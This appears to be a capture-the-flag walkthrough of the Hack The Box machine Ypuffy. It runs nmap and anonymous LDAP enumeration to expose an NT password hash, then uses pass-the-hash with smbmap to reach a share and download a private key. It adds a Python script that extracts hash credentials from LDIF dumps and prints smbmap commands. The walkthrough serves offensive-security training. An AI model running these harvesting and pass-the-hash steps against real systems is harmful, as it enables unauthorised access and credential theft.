- nmap
- Add `ypuffy.htb` to the hosts file so we can refer to the host by name. Do this from a root shell: `sudo echo ... >> /etc/hosts` does not work, because the `>>` redirection is performed by your unprivileged shell, not by `sudo`.

```
$ echo "10.10.10.107 ypuffy.htb" >> /etc/hosts
```
- Scan for ports and services. The first pass only discovers which TCP ports answer (fast, no service probes); the second runs version detection and the default NSE scripts against just those ports.

```
# Use nmap to find open TCP ports quickly: keep the "NNN/tcp" lines of the
# normal output, strip everything after the port number and join the numbers
# into a comma-separated list
$ ypuffy_tcp_ports=$( \
    nmap ypuffy.htb \
        -p- \
        --min-rate=1000 \
        -T4 \
    | grep '^[0-9]' \
    | cut -d '/' -f 1 \
    | tr '\n' ',' \
    | sed 's/,$//' \
)

# Scan the found ports for services (-sV) with the default scripts (-sC)
$ nmap ypuffy.htb \
    -p "${ypuffy_tcp_ports}" \
    -sV \
    -sC \
    -T4 \
    -oA nmap-tcp-foundports
```

`--min-rate=1000` trades accuracy for speed; on a lossy link it can drop ports, so rerun the full-range scan without it if the service scan comes back thinner than expected.
- Use the `ldap-rootdse` NSE script to pull the LDAP root DSE (naming contexts, supported extensions). This needs no credentials; the root DSE is readable anonymously on most directories.

```
$ nmap ypuffy.htb \
    -p 389 \
    --script ldap-rootdse \
    -Pn
...
PORT    STATE SERVICE
389/tcp open  ldap
| ldap-rootdse:
| LDAP Results
|   <ROOT>
|       supportedLDAPVersion: 3
|       namingContexts: dc=hackthebox,dc=htb
|       supportedExtension: 1.3.6.1.4.1.1466.20037
|_      subschemaSubentry: cn=schema
...
```

`namingContexts` gives the base DN to search from in the next step. The single `supportedExtension` OID, 1.3.6.1.4.1.1466.20037, is the StartTLS extended operation.
- Now use the `ldap-search` NSE script to dump the directory: an anonymous bind followed by a subtree search from the base DN found above

```
$ nmap ypuffy.htb \
    -p 389 \
    --script ldap-search \
    -Pn
```
- You can also use `ldapsearch` to perform the same LDAP search as the nmap `ldap-search` NSE script. `-x` requests a simple bind and, with no `-D`/`-w`, that bind is anonymous: everything returned below is readable by anyone who can reach port 389.

```
$ ldapsearch -h ypuffy.htb \
    -x \
    -s sub \
    -b "dc=hackthebox,dc=htb"
```

Newer OpenLDAP clients no longer accept `-h`; `-H ldap://ypuffy.htb` is the portable form of the same option.
The LDAP search output above contains a `sambaNTPassword` attribute for alice1978, handed to an anonymous bind. An NT hash is password-equivalent for NTLM authentication, so there is nothing to crack: we can pass the hash straight to SMB. Let's see if it gets us anywhere.
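The step between the two commands above (spotting the hash in the LDIF and turning it into something `smbmap` accepts) is worth automating when a directory has more than one account. The following is an added example for this write-up, not code from the original page or from any tool it uses: a small LDIF parser that pairs each entry's `uid` with its `sambaNTPassword` and emits the `LM:NT` string `smbmap` and the impacket tools take. The LDIF in the block is constructed for the example; alice1978 and her hash are the page's, while the `webuser` account, the `description` attribute and the folded/base64 encodings are made up to exercise the two LDIF features a quick `grep` gets wrong (RFC 2849 continuation lines and `::` base64 values).

```python
"""Extract pass-the-hash credentials from an ldapsearch LDIF dump.

Added example (not code from the original write-up): parses the LDIF that
`ldapsearch -x -s sub -b "dc=hackthebox,dc=htb"` prints and pairs each
entry's uid with its sambaNTPassword, in the LM:NT form smbmap accepts.
"""
import base64
import re

# LM hash of the empty password, used when the directory stores no
# sambaLMPassword. NTLM authentication ignores the LM half anyway, which is
# why repeating the NT hash in that slot (as the write-up does) also works.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

# Constructed sample in ldapsearch's output format. alice1978 and her NT hash
# are from the page; `webuser`, the description attribute and the folded and
# base64-encoded values are made up to exercise the parser.
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <dc=hackthebox,dc=htb> with scope subtree
#

# alice1978, passwd, hackthebox.htb
dn: uid=alice1978,ou=passwd,dc=hackthebox,dc=htb
uid: alice1978
cn: Alice
objectClass: account
objectClass: posixAccount
objectClass: sambaSamAccount
description:: RXhhbXBsZSBhY2NvdW50
sambaNTPassword: 0B186E661BBDBD
 CF6047784DE8B9FD8B

# webuser, passwd, hackthebox.htb
dn: uid=webuser,ou=passwd,dc=hackthebox,dc=htb
uid: webuser
objectClass: account
objectClass: posixAccount

# search result
search: 2
result: 0 Success

# numResponses: 3
# numEntries: 2
"""

# attribute name, ":" or "::" separator, optional space, value
ATTR_RE = re.compile(r"^([A-Za-z][\w.;-]*)(::?)\s?(.*)$")


def parse_ldif(text):
    """Return a list of entries, each {attr_lowercase: [values]}.

    A line starting with a space continues the previous value; `attr::` marks
    a base64 value. `attr:< url` references are kept as the raw string.
    Blocks without a dn (ldapsearch's trailing search/result lines) are
    dropped, since a real LDIF entry always starts with dn.
    """
    unfolded = []
    for line in text.splitlines():
        if line.startswith(" ") and unfolded:
            unfolded[-1] += line[1:]
        else:
            unfolded.append(line)

    entries, current = [], {}
    for line in unfolded + [""]:        # sentinel blank flushes the last entry
        if not line.strip():
            if "dn" in current:
                entries.append(current)
            current = {}
            continue
        if line.startswith("#"):
            continue
        m = ATTR_RE.match(line)
        if not m:
            continue                    # not an attribute line; ignore it
        name, sep, value = m.groups()
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", "replace")
        current.setdefault(name.lower(), []).append(value)
    return entries


def pth_credentials(text):
    """Return [(uid, 'LM:NT'), ...] for every entry that exposes an NT hash."""
    creds = []
    for entry in parse_ldif(text):
        uids = entry.get("uid")
        nt = entry.get("sambantpassword")
        if not uids or not nt:
            continue
        nt_hash = nt[0].strip().lower()
        if not re.fullmatch(r"[0-9a-f]{32}", nt_hash):
            continue                    # truncated or junk value; skip it
        lm_hash = entry.get("sambalmpassword", [EMPTY_LM])[0].strip().lower()
        creds.append((uids[0], f"{lm_hash}:{nt_hash}"))
    return creds


if __name__ == "__main__":
    for user, lm_nt in pth_credentials(SAMPLE_LDIF):
        print(f"smbmap -H ypuffy.htb -u {user} -p '{lm_nt}'")
```

Feed it the real dump with `python3 ldif_pth.py < ldapsearch.out` after swapping `SAMPLE_LDIF` for `sys.stdin.read()`; the 32-hex-digit check keeps a folded value that failed to unfold from being passed to `smbmap` as a bogus credential.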
- Use smbmap and the sambaNT hash we found to enumerate SMB with alice1978's credentials

```
# smbmap takes the hash as LM:NT. We only have the NT hash, so it is pasted
# into both slots with a colon separator; NTLM auth ignores the LM half.
$ smbmap -H ypuffy.htb \
    -u alice1978 \
    -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B'
[+] Finding open SMB ports....
[+] Hash detected, using pass-the-hash to authentiate
[+] User session establishd on ypuffy.htb...
[+] IP: ypuffy.htb:445  Name: ypuffy.htb
        Disk                                                    Permissions
        ----                                                    -----------
        alice                                                   READ, WRITE
        IPC$                                                    NO ACCESS
```
- Add the `-R` flag to recursively list the contents of directories in the share(s) to which alice1978 has access

```
$ smbmap -H ypuffy.htb \
    -u alice1978 \
    -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' \
    -R
[+] Finding open SMB ports....
[+] Hash detected, using pass-the-hash to authentiate
[+] User session establishd on ypuffy.htb...
[+] IP: ypuffy.htb:445  Name: ypuffy.htb
        Disk                                                    Permissions
        ----                                                    -----------
        alice                                                   READ, WRITE
        .\
        dr--r--r--                0 Wed Jun  5 14:07:31 2019    .
        dr--r--r--                0 Tue Jul 31 20:16:50 2018    ..
        -r--r--r--             1460 Mon Jul 16 18:38:51 2018    my_private_key.ppk
        IPC$                                                    NO ACCESS
```
- Let's download that private key file using the `--download` option of smbmap

```
$ smbmap -H ypuffy.htb \
    -u alice1978 \
    -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' \
    --download alice/my_private_key.ppk
[+] Finding open SMB ports....
[+] Hash detected, using pass-the-hash to authentiate
[+] User session establishd on ypuffy.htb...
[+] Starting download: alice\my_private_key.ppk (1460 bytes)
[+] File output to: /lsec/HtB/Machines/Ypuffy/ypuffy.htb-alice_my_private_key.ppk
```

The `.ppk` extension is PuTTY's private key format, which OpenSSH will not load as-is; convert it first with `puttygen my_private_key.ppk -O private-openssh -o id_rsa` before trying it against SSH.